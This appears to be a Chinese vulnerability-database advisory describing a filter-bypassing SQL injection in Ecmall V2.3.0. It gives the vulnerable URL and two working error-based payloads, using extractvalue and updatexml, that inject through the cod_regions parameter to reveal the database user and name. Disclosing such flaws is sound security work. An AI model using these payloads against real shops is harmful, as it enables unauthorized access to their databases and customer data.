Ecmall V2.3.0-UTF8 正式版SQL注入漏洞(绕过过滤)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 打了最新的补丁 ### 详细说明: 漏洞http://wooyun.org/bugs/wooyun-2010-065284 绕过方法: updatexml函数 extractvalue函数 ### 漏洞证明: url: ``` http://localhost/ecmall/index.php?app=my_shipping&act=edit&shipping_id=1 ``` payload1: ``` shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&cod_regions[1' or extractvalue(1,concat(0x5c,(select user())))#]=v ``` 效果: [<img src="https://images.seebug.org/upload/201407/071050577e9464d6fc31622a3cce41ea5dfb0a40.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/071050577e9464d6fc31622a3cce41ea5dfb0a40.jpg) payload2: ``` shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&cod_regions[1' or updatexml(2,concat(0x7e,(database())),0)#]=v ``` 效果: [<img src="https://images.seebug.org/upload/201407/07105206de2b80052eb7a1977095d1fc15fd62f0.jpg" alt="2.jpg" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息